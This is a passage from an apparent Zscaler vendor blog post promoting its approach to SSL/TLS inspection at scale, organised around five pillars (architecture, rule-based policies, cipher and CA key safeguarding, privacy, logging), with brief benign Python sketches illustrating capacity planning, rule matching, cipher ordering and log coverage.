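As a rough illustration of the horizontal scaling just described, a capacity-planning sketch for forwarding-gateway VMs might look like the following. The per-VM throughput figure and the redundancy policy are made-up assumptions for the example, not Zscaler specifications.

```python
import math

def connectors_needed(egress_gbps, per_vm_gbps=2.0, redundancy=1):
    """Horizontal scale-out estimate: enough VMs to carry the egress
    load at the assumed per-VM throughput, plus N redundant VMs.
    (All figures here are illustrative assumptions.)"""
    return math.ceil(egress_gbps / per_vm_gbps) + redundancy
```

For example, 9 Gbps of workload egress at an assumed 2 Gbps per VM would need five VMs for load plus one redundant VM; vertical scaling would instead raise the assumed `per_vm_gbps` by moving to a larger instance type.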
Image 2: SSL inspection performed at scale in Zscaler’s Zero Trust Exchange Zscaler’s approach to SSL inspection is based on five key pillars that maximize security and ensure cloud-scale performance: Image 3: 5 pillars of SSL inspection Pillar 1: The right architecture for scale Your SSL inspection solution must be able to scale and decrypt 100% of traffic without any impact on throughput or latency. There can be no compromises in this area. High throughput and low latency are crucial for maintaining consistent application performance and enabling SSL inspection for all network traffic. Inspecting all network traffic is essential to avoid any blind spots in your cloud egress protection. This is where capacity-constrained legacy NGFW appliance vendors suffer the most and compromise either on coverage or throughput. To illustrate their struggle, it’s not uncommon to see legacy NGFW vendors publish deployment best practices for decrypting only “high risk” URL categories while trusting the others. These constraints put customers in a precarious scenario in which risk can go unchecked, unmanaged, and unmitigated. The best way to achieve high scale is through a multitenant and purpose-built solution with custom-built SSL-accelerated hardware. Pillar 2: Easy to use In an ideal world, customers would just flip an SSL switch and everything would automatically work. In reality, risks due to various compliance regulations and incompatible applications need to be managed for a successful rollout. The top operational feature is a robust, rule-based SSL inspection engine that allows you to pick and choose which traffic gets inspected and which traffic gets exempted, based on traffic source and destination.
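The pick-and-choose rule evaluation described above can be sketched as a first-match-wins loop with a safe default of "inspect" (so nothing is silently exempted). The rule fields, category names, and tag values here are hypothetical, not Zscaler's actual policy schema.

```python
def ssl_action(source_tags, dest_category, rules):
    """First matching rule wins; default is to inspect (no blind spots)."""
    for rule in rules:
        # Destination-based criterion, e.g. exempting pinned apps.
        if "dest_category" in rule and rule["dest_category"] == dest_category:
            return rule["action"]
        # Source-based criterion, e.g. a workload tag.
        if "source_tag" in rule:
            key, value = rule["source_tag"]
            if source_tags.get(key) == value:
                return rule["action"]
    return "inspect"

# Hypothetical ruleset: exempt certificate-pinned apps and legacy workloads.
rules = [
    {"dest_category": "certificate-pinned-apps", "action": "exempt"},
    {"source_tag": ("environment", "legacy"), "action": "exempt"},
]
```

Ordering rules this way lets a team stagger a rollout: start with broad exemptions, then tighten them rule by rule while the default keeps all remaining traffic inspected.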
The following is a great example of how Zscaler includes extensive options for configuring rules: Image 4: Multiple filters/criteria enable flexible and granular SSL inspection policies The Zscaler SSL rule engine supports over a dozen criteria, allowing secops/netops teams to selectively enable SSL inspection for a subset of workload traffic. For example: Managing SSL inspection levels based on varying data privacy regulations Managing SSL inspection levels based on accounts/subscriptions/projects and VPCs/VNETs/subnets Managing SSL inspection levels based on user-defined tags and cloud provider attributes Excluding legacy applications from SSL inspection Enabling SSL inspection in a staggered manner for a smoother rollout and adoption For multi-cloud deployments that include AWS, Azure, and Google Cloud regions, network and security teams have the flexibility to enable SSL inspection for: All clouds and regions All workloads in a specific cloud, e.g., AWS All workloads in a VPC or VNET Specific workloads in a VPC or VNET subnet Image 5: SSL inspection applied at varying application scope Pillar 3: Secure decryption When opening up encrypted SSL traffic, it is vital that the security of the end-to-end connection is not sacrificed and that all sensitive cryptographic key material is safely handled according to industry best practices. Pillar 3a: Optimized cipher suites and TLS version selection This tends to be overlooked due to the complex nature of cipher suite variants. The SSL inspection solution must guarantee that cipher suite strength is equivalent to, or stronger than, what is negotiated without SSL inspection. For example, if a client machine proposes a perfect forward secrecy (PFS) cipher suite such as ECDHE_RSA_WITH_AES_256_CBC_SHA384, the SSL proxy needs to prefer it over weaker static RSA ciphers. The Zscaler design principle aims to make this process as simple and secure as possible.
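The strength-prioritized selection described above can be sketched as re-ordering whatever the client advertises against a server-side preference list, so a PFS (ECDHE) suite wins over static RSA regardless of the order the client sent. The ranking below is an illustrative toy list, not Zscaler's actual cipher configuration.

```python
# Illustrative server-side preference, strongest first: PFS (ECDHE)
# suites outrank static-RSA suites of any key size.
PREFERENCE = [
    "ECDHE_RSA_WITH_AES_256_GCM_SHA384",
    "ECDHE_RSA_WITH_AES_256_CBC_SHA384",
    "RSA_WITH_AES_256_CBC_SHA",
    "RSA_WITH_AES_128_CBC_SHA",
]

def prioritize(advertised):
    """Return the advertised suites re-ordered by server-side preference,
    dropping any suite not on the preference list."""
    rank = {name: i for i, name in enumerate(PREFERENCE)}
    return sorted((s for s in advertised if s in rank), key=rank.__getitem__)

# A client that lists a weak static-RSA suite first still gets the
# ECDHE suite selected.
client_offer = ["RSA_WITH_AES_128_CBC_SHA", "ECDHE_RSA_WITH_AES_256_CBC_SHA384"]
```

This mirrors the guarantee in the text: the negotiated suite is never weaker than what the workload would have negotiated without inspection.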
Zscaler chooses the strongest cipher advertised by the workload and always proposes a strength-prioritized list of cipher suites to the server, even if it results in additional cryptographic computation overhead. The following illustrates this principle through the Zscaler TLS 1.3 acceleration hardware upgrade that was completed in December 2021. Once this was launched, our customers observed, overnight, a major difference in TLS version negotiation on both their client side and server side. This significant upgrade was seamless for our customers across the board. Imagine the substantial operating effort needed to manually upgrade instance types, OSs, and drivers on virtual security appliances in order to achieve similar results. Pillar 3b: Key material safeguarding Zscaler offers two intermediate Certificate Authority (CA) enrollment models: bring-your-own CA and the Zscaler default root/intermediate CA. For the first option, Zscaler acts as a key custodian on behalf of the customer and assumes responsibility for protecting that key. While the widespread adoption of perfect forward secrecy (PFS) ciphers has mitigated the risk of passive eavesdropping, an active MITM attack is still possible. Issuing a CA private key is like issuing a key to the kingdom. If a bad actor gets ahold of a private key, they can issue arbitrary forged certificates for trusted domains. In combination with DNS poisoning, bad actors can launch MITM attacks using certificates that appear trusted to the client. To mitigate this risk, Zscaler employs a robust array of key material safeguarding techniques, from short-lived keys and revocation endpoints to stringent production access controls and audits, along with other compensatory management, operational, and technical safeguards. The highlighted CA below (the t stands for temp) showcases Zscaler’s short-lived issuing CA, which is automatically rotated on a weekly basis, significantly minimizing potential attack windows.
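The weekly-rotation idea can be sketched as a simple age check against the rotation window. The seven-day window mirrors the cadence described above; the function itself is illustrative, not Zscaler's implementation.

```python
from datetime import datetime, timedelta

# Assumed rotation cadence for a short-lived issuing CA (weekly, per the
# description above).
ROTATION_PERIOD = timedelta(days=7)

def needs_rotation(issued_at, now):
    """True once the issuing CA key has been live for the full window."""
    return now - issued_at >= ROTATION_PERIOD

issued = datetime(2023, 11, 1)
```

The security benefit is that a stolen key is only useful until the next rotation, so the attack window is bounded by `ROTATION_PERIOD` rather than by a multi-year CA lifetime.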
To further advance key protection, even for the most highly regulated and security-stringent organizations, Zscaler recently launched a first-of-its-kind turnkey Cloud HSM (FIPS 140-2 Level 3 validated) solution for safeguarding our customers' issuing CA private keys—the industry gold standard for key protection. In the fully integrated solution, the CA private key resides for its entire lifetime inside the Cloud HSM and is used dynamically to sign domain certificates. Pillar 4: Design for privacy Opening up an SSL connection that was supposed to preserve privacy inherently introduces risk to privacy. The right architecture mitigates this risk. Security and privacy are at the core of the Zscaler architecture. Our fundamental principle is that we should minimize the data sets that are collected and secure them across the whole lifecycle: in use, in motion, and at rest. Don’t just take our word for it: all our information security controls are validated by independent third-party assessors against all the leading compliance and data privacy frameworks, including DoD IL5, the US Department of Defense's highest standard for cloud vendors. Zscaler also undergoes an independent Sensitive Data Handling Assessment that verifies documented encryption controls and client key management, while also validating that any stored key information is unexploitable through an examination of activity logs, core dump files, and database schemas. To learn more, visit here. Pillar 5: Visibility Comprehensive operational visibility is vital for both establishing trust and addressing several key questions: What is your SSL inspection coverage? Are there any problems due to incompatible apps? Are you observing any obsolete TLS versions? Are you using the most secure ciphers? What value are you getting from SSL inspection (i.e., threats, DLP incidents)? The foundation to address these questions starts with the raw log data.
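Answering the coverage and compatibility questions above reduces to simple aggregation over transaction-level logs. The records and field names below are illustrative stand-ins for real log data, not Zscaler's log schema.

```python
# Hypothetical transaction-level TLS log records (field names illustrative).
logs = [
    {"dest": "api.example.com", "tls_version": "TLS1.3", "decrypted": True},
    {"dest": "pinned.example.com", "tls_version": "TLS1.2", "decrypted": False},
    {"dest": "files.example.com", "tls_version": "TLS1.3", "decrypted": True},
]

def inspection_coverage(records):
    """Fraction of TLS transactions that were decrypted and inspected."""
    return sum(r["decrypted"] for r in records) / len(records)

# Destinations that were never decrypted are candidates for follow-up:
# incompatible (pinned) apps or deliberate exemptions.
incompatible = [r["dest"] for r in logs if not r["decrypted"]]
```

This kind of per-transaction rollup is only possible when the logging plane records every connection individually, which is why aggregate-only logging cannot answer the same questions.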
A robust logging plane capable of capturing high-fidelity, context-rich transaction-level logs at scale (not the aggregate-level logging other vendors may resort to due to architectural deficiencies) is imperative. Zscaler’s Nanologs capture 18+ unique TLS log fields for each TLS connection (decrypted, undecrypted, and failed), as seen here. Once you have the basics in place, answering the operational and value questions is straightforward. Example 1: Failed client SSL handshake logs proactively surface misbehaving clients. Conclusion Zscaler's platform enables scalable SSL inspection, capable of handling the throughput supported by cloud-native egress solutions without sacrificing performance. SSL inspection at scale is a crucial capability to protect workloads and application data, but since the original protocol was not designed to be inspected by a trusted third party, it also introduces risk. Zscaler acknowledges and mitigates these risks through its purpose-built, cloud-native security platform following five fundamental principles. Given that over 90% of internet traffic is now encrypted, and malicious actors, including insider threats, have leveraged the privacy provided by SSL to disseminate malware and exfiltrate data, inspecting this traffic at scale is critical for preventing compromise and data loss, along with improving survivability in the current threat landscape. While there are risks associated with performing SSL inspection, Zscaler has implemented controls, as outlined in this article, that have made this an acceptable level of risk for over 7,000 global customers. To find out more, visit our product webpage and watch the webinar. Wed, 08 Nov 2023 04:00:01 -0800 Mrigank Singh